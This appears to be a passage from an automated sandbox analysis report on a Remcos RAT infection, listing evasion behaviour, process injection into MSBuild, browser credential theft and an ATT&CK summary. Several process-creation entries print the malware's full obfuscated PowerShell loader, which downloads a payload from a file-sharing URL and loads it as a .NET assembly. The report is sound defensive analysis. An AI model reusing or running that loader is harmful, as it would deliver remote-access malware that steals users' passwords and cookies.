          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Delayed program exit found
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040E18D Sleep,ExitProcess,8_2_0040E18D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_004186FE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4615Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5211Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 766Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 8718Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: foregroundWindowGot 1764Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6568Thread sleep time: -16602069666338586s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2132Thread sleep count: 244 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2132Thread sleep time: -122000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4424Thread sleep count: 766 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4424Thread sleep time: -2298000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4424Thread sleep count: 8718 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4424Thread sleep time: -26154000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041A01B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040B28E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0040838E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004087A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00407848
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004068CD FindFirstFileW,FindNextFileW,8_2_004068CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0044BA59 FindFirstFileExA,8_2_0044BA59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040AA71
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00417AAB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040AC78
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00406D28
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: powershell.exe, 00000002.00000002.2500458772.0000016F7E011000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWawDe%SystemRoot%\system32\mswsock.dll "FileSystemRights" = [System.Security.AccessControl.FileSystemRights]
          Source: wscript.exe, 00000001.00000002.2305799629.000002309F0B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\e%
          Source: wscript.exe, 00000001.00000002.2305119705.000002309E429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2305799629.000002309F0B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3527819349.000000000127D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: wscript.exe, 00000001.00000002.2305119705.000002309E429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_8-47835
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_004327AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041A8DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004407B5 mov eax, dword ptr fs:[00000030h]8_2_004407B5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,8_2_00410763
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_004327AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004328FC SetUnhandledExceptionFilter,8_2_004328FC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_004398AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00432D5C

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 23.186.113.60 443Jump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 456000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46E000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 474000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 475000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: C8E008Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe8_2_00410B5C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004175E1 mouse_event,8_2_004175E1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$uucrpclgmlldzklglzch = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khugfwkclcfbkpjrgwto = $uucrpclgmlldzklglzch -replace '#', 't';$boksbmcmwwtzwevwaoqx = 'https://3005.filemail.com/api/file/get?filekey=nix_5t0lxhobjilnb9crviabpjrw2dlc-lxeodjpf_z_1mp6cuqbs5kcpta&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqglwpwlepgltbgwki = new-object system.net.webclient;$utrgglzewzaiuklalckk = $qkoqglwpwlepgltbgwki.downloaddata($boksbmcmwwtzwevwaoqx);$kznfbhlakweixbikolmf = [system.text.encoding]::utf8.getstring($utrgglzewzaiuklalckk);$pqgmgjhcudhptwongzoi = '<<base64_start>>';$fkbtkicqwukuckzfpsgz = '<<base64_end>>';$iwkjiplrkkzmllztwnaz = $kznfbhlakweixbikolmf.indexof($pqgmgjhcudhptwongzoi);$klqhkklolqnlpaawtufc = $kznfbhlakweixbikolmf.indexof($fkbtkicqwukuckzfpsgz);$iwkjiplrkkzmllztwnaz -ge 0 -and $klqhkklolqnlpaawtufc -gt $iwkjiplrkkzmllztwnaz;$iwkjiplrkkzmllztwnaz += $pqgmgjhcudhptwongzoi.length;$wzwcixkgqljwlkablnwb = $klqhkklolqnlpaawtufc - $iwkjiplrkkzmllztwnaz;$bqfbkpmigkpwmknxlccr = $kznfbhlakweixbikolmf.substring($iwkjiplrkkzmllztwnaz, $wzwcixkgqljwlkablnwb);$izpdconcauwpfczuwzns = [system.convert]::frombase64string($bqfbkpmigkpwmknxlccr);$gtulnokhlcioutbualkp = [system.reflection.assembly]::load($izpdconcauwpfczuwzns);$apozwguwpfkczdpksqdk = [dnlib.io.home].getmethod('vai').invoke($null, [object[]] @($khugfwkclcfbkpjrgwto,'','','','msbuild','','','','','c:\programdata\','marly','js','1','1','pessaries'))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$uucrpclgmlldzklglzch = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khugfwkclcfbkpjrgwto = $uucrpclgmlldzklglzch -replace '#', 't';$boksbmcmwwtzwevwaoqx = 'https://3005.filemail.com/api/file/get?filekey=nix_5t0lxhobjilnb9crviabpjrw2dlc-lxeodjpf_z_1mp6cuqbs5kcpta&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqglwpwlepgltbgwki = new-object system.net.webclient;$utrgglzewzaiuklalckk = $qkoqglwpwlepgltbgwki.downloaddata($boksbmcmwwtzwevwaoqx);$kznfbhlakweixbikolmf = [system.text.encoding]::utf8.getstring($utrgglzewzaiuklalckk);$pqgmgjhcudhptwongzoi = '<<base64_start>>';$fkbtkicqwukuckzfpsgz = '<<base64_end>>';$iwkjiplrkkzmllztwnaz = $kznfbhlakweixbikolmf.indexof($pqgmgjhcudhptwongzoi);$klqhkklolqnlpaawtufc = $kznfbhlakweixbikolmf.indexof($fkbtkicqwukuckzfpsgz);$iwkjiplrkkzmllztwnaz -ge 0 -and $klqhkklolqnlpaawtufc -gt $iwkjiplrkkzmllztwnaz;$iwkjiplrkkzmllztwnaz += $pqgmgjhcudhptwongzoi.length;$wzwcixkgqljwlkablnwb = $klqhkklolqnlpaawtufc - $iwkjiplrkkzmllztwnaz;$bqfbkpmigkpwmknxlccr = $kznfbhlakweixbikolmf.substring($iwkjiplrkkzmllztwnaz, $wzwcixkgqljwlkablnwb);$izpdconcauwpfczuwzns = [system.convert]::frombase64string($bqfbkpmigkpwmknxlccr);$gtulnokhlcioutbualkp = [system.reflection.assembly]::load($izpdconcauwpfczuwzns);$apozwguwpfkczdpksqdk = [dnlib.io.home].getmethod('vai').invoke($null, [object[]] @($khugfwkclcfbkpjrgwto,'','','','msbuild','','','','','c:\programdata\','marly','js','1','1','pessaries'))"Jump to behavior
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerFK\-
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerFK\l
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerFK\k
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerFK\
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS#
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001255000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerFK\$
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerFK\#
          Source: MSBuild.exe, 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3527819349.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerFK\86
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004329DA cpuid 8_2_004329DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,8_2_0040E2BB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,8_2_0044F17B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,8_2_0044F130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,8_2_0044F216
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_0044F2A3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,8_2_0044F4F3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_0044F61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,8_2_0044F723
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_0044F7F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,8_2_00445914
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,8_2_00445E1C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_0044EEB8
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00404F31 GetLocalTime,CreateEventA,CreateThread,8_2_00404F31
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004195F8 GetComputerNameExW,GetUserNameW,8_2_004195F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_004466BF
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5600, type: MEMORYSTR
          Contains functionality to steal Chrome passwords or cookies
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data8_2_0040A953
          Contains functionality to steal Firefox passwords or cookies
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\8_2_0040AA71
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \key3.db8_2_0040AA71

          Remote Access Functionality

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 2.2.powershell.exe.16f1056dd48.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.powershell.exe.16f1056dd48.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.powershell.exe.16f115cf6e8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5600, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: cmd.exe8_2_0040567A

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information22
          Scripting          		Valid Accounts1
          Native API          		22
          Scripting          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		2
          System Time Discovery          		Remote Services11
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
